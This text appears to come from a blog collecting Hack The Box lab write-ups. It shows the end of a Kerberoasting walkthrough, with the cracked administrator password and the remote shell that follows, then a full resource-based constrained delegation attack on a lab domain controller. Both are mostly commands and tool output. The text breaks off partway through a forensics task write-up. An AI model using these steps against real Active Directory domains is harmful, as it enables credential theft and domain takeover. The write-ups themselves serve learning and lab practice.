LDAP        10.129.10.151   389    DC               [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb', 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb', 'CN=Schema Admins,CN=Users,DC=active,DC=htb', 'CN=Administrators,CN=Builtin,DC=active,DC=htb'], pwdLastSet: 2018-07-19 02:06:40.351723, lastLogon: 2026-03-30 11:34:01.020566
LDAP        10.129.10.151   389    DC               $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$365be1d617ecacfb38f8ba17510a4830$49358c60a5c8987281615a406acd570d5925424ba11172eea4c43b4564047874d81871461f500825d591d8e3e3ce54efea7b2caf76716fa1ca5a0e297561215653b40bd4e4a2c0ea973b160fe226cbcf5628501a62d8039f1b1748cf11e3ff968844c8c16fe84954969931eac933ff946bb990e3548e485185e530c34d74abbee25dcfd516b4cb14c22a039778cf3d2eeced5e712908a42cea8278cabb271520a9cb6373ce9b6eeb2f99568fca227e425e9d42d250d571ef12e853570f0fd29670788eca5d65bb3ee9643a2f746ed9c549e52287242e1e3988fcce814092fa2eed519e7c9bc74da86fda0c3a61b8e5a0fb8962710f2c091387e326b74b829f09dac1af8902358d1327505ac31c4d10926e518d691b2c338c5ab1218e595c7180833c273f1c28f6d41d76b6ddf9d16cc559ffbe0e4cde0a787ec2924be638c1321ab4854f9f1728bb13d44d19400c64a4f97a12aeb044c94ece3cc6cb8b512856dd5bf4228aa1e8398f4817434802620f720bafdb4689423f75307fae4418c5afd83452118f25374bfd99248d2e8cd8228fa4b2e2101f3c1f9e57c86b3df03c6807d109bd164a72d42f699009d7ae7dcffc8dcecf07096a46c11f4355342f6ccc72d3ae380d2be6dc123a60376cbc3d53fc5b11d4989f82d390d6bf4713198ac3d88999d160b833e9b341576be0bb395896f6b6c001075e638253e6ee745edba4c5f73b80772e9d21b1e73c9e2b33026f587d9ada5148895727852db6ace2ee077de4baff21d9ce594c7c5ea028cb82027fe7090bb4be18fba30570cb39c96f1feba0b304ef4b38cbc43e1aa9f79e36f370f9d42912b8893f2415389489f1037aaf0737b9509b0e2e9998c81c3294ca9ecdaf6f380b1d6b7514dcd6c592736274dac39b26bf96eda3698722b3b565715770545057c9d21b7a8285f15ad7ca7bae480a693e1c0bf0a6a0571fc9971c49aa4d8089603e0edfbf24877c220bafab60dd5fcdeaf745748c31509549d9e8188923ff0d382c94ac1e86ceb191c2e419bfef5c783b2b9b178f81529614d05764e55682517f1fd648067fe4a755aba150031bc8f19d1accd2dbbc96ba89160eb9569808ff1826fc2c581ca7ad77c95cb2b032d29a0cb04f53b6687616b2f7ec9af06f501efcec3a8fbf94dc696def548eb9c49cfc608e64a9a78440c811020b04f3dcfacc956b2a8c83d6906f846bcc0e24a0e2747a19a28bcead485c465fbf9e6ceb6ee4cc6630cb31882a

└─$ hashcat -m 13100 out.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13650HX, 6902/13805 MB (2048 MB allocatable), 20MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 517 MB (14596 MB free)

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$365be1d617ecacfb38f8ba17510a4830$49358c60a5c8987281615a406acd570d5925424ba11172eea4c43b4564047874d81871461f500825d591d8e3e3ce54efea7b2caf76716fa1ca5a0e297561215653b40bd4e4a2c0ea973b160fe226cbcf5628501a62d8039f1b1748cf11e3ff968844c8c16fe84954969931eac933ff946bb990e3548e485185e530c34d74abbee25dcfd516b4cb14c22a039778cf3d2eeced5e712908a42cea8278cabb271520a9cb6373ce9b6eeb2f99568fca227e425e9d42d250d571ef12e853570f0fd29670788eca5d65bb3ee9643a2f746ed9c549e52287242e1e3988fcce814092fa2eed519e7c9bc74da86fda0c3a61b8e5a0fb8962710f2c091387e326b74b829f09dac1af8902358d1327505ac31c4d10926e518d691b2c338c5ab1218e595c7180833c273f1c28f6d41d76b6ddf9d16cc559ffbe0e4cde0a787ec2924be638c1321ab4854f9f1728bb13d44d19400c64a4f97a12aeb044c94ece3cc6cb8b512856dd5bf4228aa1e8398f4817434802620f720bafdb4689423f75307fae4418c5afd83452118f25374bfd99248d2e8cd8228fa4b2e2101f3c1f9e57c86b3df03c6807d109bd164a72d42f699009d7ae7dcffc8dcecf07096a46c11f4355342f6ccc72d3ae380d2be6dc123a60376cbc3d53fc5b11d4989f82d390d6bf4713198ac3d88999d160b833e9b341576be0bb395896f6b6c001075e638253e6ee745edba4c5f73b80772e9d21b1e73c9e2b33026f587d9ada5148895727852db6ace2ee077de4baff21d9ce594c7c5ea028cb82027fe7090bb4be18fba30570cb39c96f1feba0b304ef4b38cbc43e1aa9f79e36f370f9d42912b8893f2415389489f1037aaf0737b9509b0e2e9998c81c3294ca9ecdaf6f380b1d6b7514dcd6c592736274dac39b26bf96eda3698722b3b565715770545057c9d21b7a8285f15ad7ca7bae480a693e1c0bf0a6a0571fc9971c49aa4d8089603e0edfbf24877c220bafab60dd5fcdeaf745748c31509549d9e8188923ff0d382c94ac1e86ceb191c2e419bfef5c783b2b9b178f81529614d05764e55682517f1fd648067fe4a755aba150031bc8f19d1accd2dbbc96ba89160eb9569808ff1826fc2c581ca7ad77c95cb2b032d29a0cb04f53b6687616b2f7ec9af06f501efcec3a8fbf94dc696def548eb9c49cfc608e64a9a78440c811020b04f3dcfacc956b2a8c83d6906f846bcc0e24a0e2747a19a28bcead485c465fbf9e6ceb6ee4cc6630cb31882a:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Ad...31882a
Time.Started.....: Mon Mar 30 11:46:53 2026 (2 secs)
Time.Estimated...: Mon Mar 30 11:46:55 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  5205.5 kH/s (1.67ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10547200/14344385 (73.53%)
Rejected.........: 0/10547200 (0.00%)
Restore.Point....: 10526720/14344385 (73.39%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Tutzi2400 -> Tahlia2003
Hardware.Mon.#01.: Util: 46%

Started:
Stopped:

┌──(byt3㉿LAPTOP)-[~]
└─$ hashcat -m 13100 out.hash /usr/share/wordlists/rockyou.txt --show
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$365be1d617ecacfb38f8ba17510a4830$49358c60a5c8987281615a406acd570d5925424ba11172eea4c43b4564047874d81871461f500825d591d8e3e3ce54efea7b2caf76716fa1ca5a0e297561215653b40bd4e4a2c0ea973b160fe226cbcf5628501a62d8039f1b1748cf11e3ff968844c8c16fe84954969931eac933ff946bb990e3548e485185e530c34d74abbee25dcfd516b4cb14c22a039778cf3d2eeced5e712908a42cea8278cabb271520a9cb6373ce9b6eeb2f99568fca227e425e9d42d250d571ef12e853570f0fd29670788eca5d65bb3ee9643a2f746ed9c549e52287242e1e3988fcce814092fa2eed519e7c9bc74da86fda0c3a61b8e5a0fb8962710f2c091387e326b74b829f09dac1af8902358d1327505ac31c4d10926e518d691b2c338c5ab1218e595c7180833c273f1c28f6d41d76b6ddf9d16cc559ffbe0e4cde0a787ec2924be638c1321ab4854f9f1728bb13d44d19400c64a4f97a12aeb044c94ece3cc6cb8b512856dd5bf4228aa1e8398f4817434802620f720bafdb4689423f75307fae4418c5afd83452118f25374bfd99248d2e8cd8228fa4b2e2101f3c1f9e57c86b3df03c6807d109bd164a72d42f699009d7ae7dcffc8dcecf07096a46c11f4355342f6ccc72d3ae380d2be6dc123a60376cbc3d53fc5b11d4989f82d390d6bf4713198ac3d88999d160b833e9b341576be0bb395896f6b6c001075e638253e6ee745edba4c5f73b80772e9d21b1e73c9e2b33026f587d9ada5148895727852db6ace2ee077de4baff21d9ce594c7c5ea028cb82027fe7090bb4be18fba30570cb39c96f1feba0b304ef4b38cbc43e1aa9f79e36f370f9d42912b8893f2415389489f1037aaf0737b9509b0e2e9998c81c3294ca9ecdaf6f380b1d6b7514dcd6c592736274dac39b26bf96eda3698722b3b565715770545057c9d21b7a8285f15ad7ca7bae480a693e1c0bf0a6a0571fc9971c49aa4d8089603e0edfbf24877c220bafab60dd5fcdeaf745748c31509549d9e8188923ff0d382c94ac1e86ceb191c2e419bfef5c783b2b9b178f81529614d05764e55682517f1fd648067fe4a755aba150031bc8f19d1accd2dbbc96ba89160eb9569808ff1826fc2c581ca7ad77c95cb2b032d29a0cb04f53b6687616b2f7ec9af06f501efcec3a8fbf94dc696def548eb9c49cfc608e64a9a78440c811020b04f3dcfacc956b2a8c83d6906f846bcc0e24a0e2747a19a28bcead485c465fbf9e6ceb6ee4cc6630cb31882a:Ticketmaster1968

And we got the Admin password for logon:

user: administrator
passwd: Ticketmaster1968

└─$ sudo netexec smb dc.active.htb -u administrator -p Ticketmaster1968
SMB         10.129.10.151   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.10.151   445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

That’s it.

└─$ sudo impacket-wmiexec administrator:Ticketmaster1968@DC
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

C:\>

labs.hackthebox.com/achievement/machine/2489228/148

Until next time and Happy Hacking, together we make the Internet more bleeding!

Practical RBCD Exploitation with Only: NetExec and Impacket

Sulaiman — Sun, 29 Mar 2026 02:34:04 GMT

RBCD

In this, RBCD in the right conditions it allows users to take control of computers and domains through the simple use of the very mechanics of the Kerberos authentication protocol.

On a situation, we might find a trail of this attack-paths.

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec smb dc.phantom.vl -u wsilva -p passw0rd
SMB         10.129.234.63   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.63   445    DC               [+] phantom.vl\wsilva:passw0rd

On BloodHound:

As you can see, we have AddAllowedToAct on the DC computer account, for more deeper here’s AddAllowedToAct page, for delegations, and RBCD sources.

SpecterOps

And from there we can have access to the DC and gain Administrator.

PS: The attack can still be continued, even with MachineAccount Quota reach 0.

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec ldap dc.phantom.vl -u wsilva -p passw0rd -M maq
LDAP        10.129.234.63   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.234.63   389    DC               [+] phantom.vl\wsilva:passw0rd 
MAQ         10.129.234.63   389    DC               [*] Getting the MachineAccountQuota
MAQ         10.129.234.63   389    DC               MachineAccountQuota: 0

Practical

Add Delegation to The Computers

┌──(byt3n33dl3㉿kali)-[~]
└─$ rbcd.py -delegate-to 'DC$' -delegate-from wsilva -action write phantom/wsilva:passw0rd -dc-ip 10.129.234.63                                                                                                                             
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     wsilva       (S-1-5-21-4029599044-1972224926-2225194048-1114)

Save the TGT Ticket

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo impacket-getTGT phantom.vl/wsilva:passw0rd                                                                                                                                                                                      
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in wsilva.ccache

┌──(byt3n33dl3㉿kali)-[~]
└─$ export KRB5CCNAME=wsilva.ccache

Modify through “New Hash“

┌──(byt3n33dl3㉿kali)-[~]
└─$ describeTicket.py wsilva.ccache                                                                                                                                                                                                         
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : 459a7c14e58373b9b4b0090c999e415f
[*] User Name                     : wsilva
[*] User Realm                    : PHANTOM.VL
[*] Service Name                  : krbtgt/PHANTOM.VL
[*] Service Realm                 : PHANTOM.VL
[*] Start Time                    : 28/03/2026 22:06:09 PM
[*] End Time                      : 29/03/2026 08:06:09 AM
[*] RenewTill                     : 29/03/2026 22:07:05 PM
[*] Flags                         : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : RZp8FOWDc7m0sAkMmZ5BXw==
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : krbtgt/PHANTOM.VL
[*]   Service Realm               : PHANTOM.VL
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

┌──(byt3n33dl3㉿kali)-[~]
└─$ describeTicket.py wsilva.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 459a7c14e58373b9b4b0090c999e415f

┌──(byt3n33dl3㉿kali)-[~]
└─$ changepasswd.py -newhashes :459a7c14e58373b9b4b0090c999e415f phantom/wsilva:passw0rd@dc.phantom.vl                                                                                                                                      
Impacket v0.14.0.dev0+20260306.165346.8c155a5b - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of phantom\wsilva
[*] Connecting to DCE/RPC as phantom\wsilva
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).

Re-Export and Ask for Administrator Impersonation

┌──(byt3n33dl3㉿kali)-[~]
└─$ export KRB5CCNAME=wsilva.ccache                                                                                                                                                                                                         

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo impacket-getST -u2u -impersonate Administrator -spn cifs/DC.phantom.vl phantom.vl/wsilva -k -no-pass                                                                                                                               
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache

And that’s it, for full success we should’ve gain Administartor Kerberos key and now we can logon with a ticket.

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec smb dc.phantom.vl --use-kcache
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\Administrator from ccache (Pwn3d!)

Logon Pwn3d!

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo netexec smb dc.phantom.vl --use-kcache -X whoami
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\Administrator from ccache (Pwn3d!)
SMB         dc.phantom.vl   445    DC               [+] Executed command via wmiexec
SMB         dc.phantom.vl   445    DC               phantom\administrator

Happy hacking!

HTB Holmes 2025 3: The Enduring Echo - DFIR (Easy)

Sulaiman — Sat, 21 Mar 2026 13:08:05 GMT

From HTB: LeStrade passes a disk image to Holmes. It's one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.

Tools:

Chainsaw

Key Learning:

Microsoft Log Analysis
WMiC Analysis
Attack Trial
Purple Teaming

Task

What was the first (non cd) command executed by the attacker on the host?
Which parent process (full path) spawned the attacker’s commands?
Which remote-execution tool was most likely used for the attack?
What was the attacker’s IP address?
The attacker established multiple persistence mechanisms. What is set as the name of the earliest one created?
Identify the script executed by the persistence mechanism.
What local account did the attacker create?
What domain name did the attacker use for credential exfiltration?
What password did the attacker’s script generate for the newly created user?
What was the IP address of the internal system the attacker pivoted to?
Which TCP port on the victim was forwarded to enable the pivot?
What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings?
What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system?
Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this?

Let’s do it, let’s see what we get.

┌──(kali㉿kali)-[~]
└─$ ll
total 504532
-rw-rw-r-- 1 kali kali 516633693 Mar  1 01:28 EnduringEcho.zip

Quite big for an Easy sherlocks!

┌──(kali㉿kali)-[~]
└─$ tree .
.
├── 2025-08-25T20_20_59_5246365_ConsoleLog.txt
├── 2025-08-25T20_20_59_5246365_CopyLog.csv
├── 2025-08-25T20_20_59_5246365_SkipLog.csv.csv
├── C
│   ├── $Boot
│   ├── $Extend
│   │   ├── $J
│   │   └── $Max
│   ├── $LogFile
│   ├── $MFT
│   ├── $Secure_$SDS
│   ├── ProgramData
│   │   └── Microsoft
│   │       ├── search
│   │       │   └── data
│   │       │       └── applications
│   │       │           └── windows
│   │       │               ├── edb00009.jtx
│   │       │               ├── edb0000A.jtx
│   │       │               ├── edb0000B.jtx
│   │       │               ├── edb.jcp
│   │       │               ├── edb.jtx
│   │       │               ├── edbres00001.jrs
│   │       │               ├── edbtmp.jtx
│   │       │               ├── GatherLogs
│   │       │               │   └── SystemIndex
│   │       │               │       ├── SystemIndex.1.Crwl
│   │       │               │       ├── SystemIndex.2.Crwl
│   │       │               │       ├── SystemIndex.2.gthr
│   │       │               │       ├── SystemIndex.3.Crwl
│   │       │               │       ├── SystemIndex.3.gthr
│   │       │               │       ├── SystemIndex.4.Crwl
│   │       │               │       ├── SystemIndex.4.gthr
│   │       │               │       ├── SystemIndex.5.gthr
│   │       │               │       └── SystemIndex.6.gthr
│   │       │               ├── Windows.edb
│   │       │               └── Windows.jfm
│   │       ├── Windows
│   │       │   └── Start Menu
│   │       │       └── Programs
│   │       │           ├── Immersive Control Panel.lnk
│   │       │           └── Microsoft Edge.lnk
│   │       └── Windows Defender
│   │           └── Support
│   │               ├── MPDetection-20250814-092825.log
│   │               ├── MPDeviceControl-20250815-211450.log
│   │               ├── MPLog-20250421-104305.log
│   │               ├── MPScanSkip-20250815-211450.log
│   │               ├── MpWppCoreTracing-20250815-142151-00000003-100000000.bin
│   │               ├── MpWppCoreTracing-20250820-094743-00000003-100000000.bin
│   │               ├── MpWppCoreTracing-20250820-101110-00000003-100000000.bin
│   │               ├── MpWppCoreTracing-20250824-154427-00000003-100000000.bin
│   │               ├── MpWppCoreTracing-20250824-161359-00000003-100000000.bin
│   │               ├── MpWppCoreTracing-20250825-125026-00000003-100000000.bin
│   │               ├── MpWppTracing-20250815-212151-00000003-fffffffeffffffff.bin
│   │               ├── MpWppTracing-20250820-164749-00000003-fffffffeffffffff.bin
│   │               ├── MpWppTracing-20250820-171136-00000003-fffffffeffffffff.bin
│   │               ├── MpWppTracing-20250824-224427-00000003-fffffffeffffffff.bin
│   │               ├── MpWppTracing-20250824-231418-00000003-fffffffeffffffff.bin
│   │               └── MpWppTracing-20250825-195027-00000003-fffffffeffffffff.bin
│   ├── Users
│   │   ├── Administrator
│   │   │   ├── AppData
│   │   │   │   ├── Local
│   │   │   │   │   ├── ConnectedDevicesPlatform
│   │   │   │   │   │   └── L.Administrator
│   │   │   │   │   │       ├── ActivitiesCache.db
│   │   │   │   │   │       ├── ActivitiesCache.db-shm
│   │   │   │   │   │       └── ActivitiesCache.db-wal
│   │   │   │   │   ├── Microsoft
│   │   │   │   │   │   ├── Edge
│   │   │   │   │   │   │   └── User Data
│   │   │   │   │   │   │       └── Default
│   │   │   │   │   │   │           ├── Collections
│   │   │   │   │   │   │           │   └── collectionsSQLite
│   │   │   │   │   │   │           ├── Favicons
│   │   │   │   │   │   │           ├── History
│   │   │   │   │   │   │           ├── History-journal
│   │   │   │   │   │   │           ├── Login Data
│   │   │   │   │   │   │           ├── Network Action Predictor
│   │   │   │   │   │   │           ├── Preferences
│   │   │   │   │   │   │           ├── Sessions
│   │   │   │   │   │   │           │   ├── Session_13400625977096635
│   │   │   │   │   │   │           │   └── Tabs_13400626023916579
│   │   │   │   │   │   │           ├── Shortcuts
│   │   │   │   │   │   │           ├── Top Sites
│   │   │   │   │   │   │           ├── Web Data
│   │   │   │   │   │   │           └── Web Data-journal
│   │   │   │   │   │   ├── Internet Explorer
│   │   │   │   │   │   │   ├── brndlog.txt
│   │   │   │   │   │   │   ├── CacheStorage
│   │   │   │   │   │   │   │   ├── edb.chk
│   │   │   │   │   │   │   │   ├── edb.log
│   │   │   │   │   │   │   │   └── edbres00001.jrs
│   │   │   │   │   │   │   ├── ie4uinit-ClearIconCache.log
│   │   │   │   │   │   │   ├── ie4uinit-UserConfig.log
│   │   │   │   │   │   │   ├── IECompatData
│   │   │   │   │   │   │   │   └── iecompatdata.xml
│   │   │   │   │   │   │   └── MSIMGSIZ.DAT
│   │   │   │   │   │   ├── OneDrive
│   │   │   │   │   │   │   ├── logs
│   │   │   │   │   │   │   │   ├── Common
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-15.2106.1464.1.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-15.2106.1464.2.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-15.2122.6376.1.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-15.2122.6376.2.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1657.9712.1.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1657.9712.2.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1714.2544.1.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1714.2544.2.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1723.3084.1.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-20.1723.3084.2.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-25.1952.7744.1.odl
│   │   │   │   │   │   │   │   │   ├── FileCoAuth-2025-08-25.1952.7744.2.odl
│   │   │   │   │   │   │   │   │   ├── FileSyncConfig-2025-08-15.2106.2416.1.odl
│   │   │   │   │   │   │   │   │   ├── general.keystore
│   │   │   │   │   │   │   │   │   ├── OneDriveLauncher-2025-08-15.2132.5732.1.odl
│   │   │   │   │   │   │   │   │   ├── OneDriveLauncher-2025-08-15.2132.5732.2.odl
│   │   │   │   │   │   │   │   │   ├── OneDriveLauncher-2025-08-20.1722.2228.1.odl
│   │   │   │   │   │   │   │   │   ├── OneDriveLauncher-2025-08-20.1722.2228.2.odl
│   │   │   │   │   │   │   │   │   ├── OneDriveLauncher-2025-08-25.2002.3540.1.odl
│   │   │   │   │   │   │   │   │   ├── OneDriveLauncher-2025-08-25.2002.3540.2.aodl
│   │   │   │   │   │   │   │   │   ├── StandaloneUpdater-2025-08-15.2107.3308.1.odl
│   │   │   │   │   │   │   │   │   ├── StandaloneUpdater-2025-08-20.1720.2884.1.odl
│   │   │   │   │   │   │   │   │   ├── StandaloneUpdater-2025-08-20.1720.8080.1.odl
│   │   │   │   │   │   │   │   │   ├── StandaloneUpdater-2025-08-25.1956.8284.1.odl
│   │   │   │   │   │   │   │   │   ├── StandaloneUpdater-2025-08-25.1956.8764.1.odl
│   │   │   │   │   │   │   │   │   └── telemetry-dll-ramp-value.txt
│   │   │   │   │   │   │   │   ├── ListSync
│   │   │   │   │   │   │   │   │   ├── Business1
│   │   │   │   │   │   │   │   │   │   ├── general.keystore
│   │   │   │   │   │   │   │   │   │   ├── microsoftNucleusTelemetryCache.otc
│   │   │   │   │   │   │   │   │   │   ├── Nucleus-2025-08-15.2106.1784.1.odlgz
│   │   │   │   │   │   │   │   │   │   ├── Nucleus-2025-08-15.2106.1784.2.odlgz
│   │   │   │   │   │   │   │   │   │   ├── Nucleus-2025-08-20.1725.7484.1.odlgz
│   │   │   │   │   │   │   │   │   │   ├── Nucleus-2025-08-20.1725.7484.2.odlgz
│   │   │   │   │   │   │   │   │   │   ├── Nucleus-2025-08-25.1956.6912.1.odlgz
│   │   │   │   │   │   │   │   │   │   └── Nucleus-2025-08-25.1956.6912.2.aodl
│   │   │   │   │   │   │   │   │   └── Local
│   │   │   │   │   │   │   │   │       ├── general.keystore
│   │   │   │   │   │   │   │   │       ├── NucleusLocal-2025-08-15.2106.1784.1.odl
│   │   │   │   │   │   │   │   │       ├── NucleusLocal-2025-08-15.2106.1784.2.odl
│   │   │   │   │   │   │   │   │       ├── NucleusLocal-2025-08-20.1725.7484.1.odl
│   │   │   │   │   │   │   │   │       └── NucleusLocal-2025-08-25.1956.6912.1.aodl
│   │   │   │   │   │   │   │   └── Personal
│   │   │   │   │   │   │   │       ├── DeviceHealth.json
│   │   │   │   │   │   │   │       ├── DeviceHealthSummaryConfiguration.ini
│   │   │   │   │   │   │   │       ├── FeedbackHub
│   │   │   │   │   │   │   │       │   └── SubmissionPayload.json
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-15.2106.1464.1.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-15.2106.1464.2.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-15.2122.6376.1.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-15.2122.6376.2.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-20.1657.9712.1.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-20.1657.9712.2.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-20.1714.2544.1.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-20.1714.2544.2.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-20.1723.3084.1.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-20.1723.3084.2.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-25.1952.7744.1.odlgz
│   │   │   │   │   │   │   │       ├── FileCoAuth-2025-08-25.1952.7744.2.odlgz
│   │   │   │   │   │   │   │       ├── FileSyncConfig-2025-08-15.2106.2416.1.odlgz
│   │   │   │   │   │   │   │       ├── general.keystore
│   │   │   │   │   │   │   │       ├── Install_2025-08-14_163000_114-368.loggz
│   │   │   │   │   │   │   │       ├── Install-2025-08-14.1630.276.1.odlgz
│   │   │   │   │   │   │   │       ├── Install-2025-08-14.1630.3760.1.odlgz
│   │   │   │   │   │   │   │       ├── Install_2025-08-14_163058_3760-1908.loggz
│   │   │   │   │   │   │   │       ├── Install-2025-08-14.1631.3760.1.odlgz
│   │   │   │   │   │   │   │       ├── Install_2025-08-15_210641_7060-7056.loggz
│   │   │   │   │   │   │   │       ├── Install-2025-08-15.2106.7060.1.odlgz
│   │   │   │   │   │   │   │       ├── Install_2025-08-20_172530_7484-4008.loggz
│   │   │   │   │   │   │   │       ├── Install-PerUser_2025-08-14_163017_834-8bc.loggz
│   │   │   │   │   │   │   │       ├── Install-PerUser-2025-08-14.1630.2100.1.odlgz
│   │   │   │   │   │   │   │       ├── Install-PerUser_2025-08-14_163107_2312-5112.loggz
│   │   │   │   │   │   │   │       ├── Install-PerUser-2025-08-14.1631.2312.1.odlgz
│   │   │   │   │   │   │   │       ├── Install-PerUser_2025-08-15_210641_7224-7228.loggz
│   │   │   │   │   │   │   │       ├── Install-PerUser-2025-08-15.2106.7224.1.odlgz
│   │   │   │   │   │   │   │       ├── OneDriveLauncher-2025-08-15.2132.5732.1.odlgz
│   │   │   │   │   │   │   │       ├── OneDriveLauncher-2025-08-20.1722.2228.1.odlgz
│   │   │   │   │   │   │   │       ├── StandaloneUpdate_2025-08-15_210723_3308-3888.loggz
│   │   │   │   │   │   │   │       ├── StandaloneUpdate_2025-08-20_172023_2884-3172.loggz
│   │   │   │   │   │   │   │       ├── StandaloneUpdate_2025-08-20_172023_8080-5064.loggz
│   │   │   │   │   │   │   │       ├── StandaloneUpdater-2025-08-15.2107.3308.1.odlgz
│   │   │   │   │   │   │   │       ├── StandaloneUpdater-2025-08-20.1720.2884.1.odlgz
│   │   │   │   │   │   │   │       ├── StandaloneUpdater-2025-08-20.1720.8080.1.odlgz
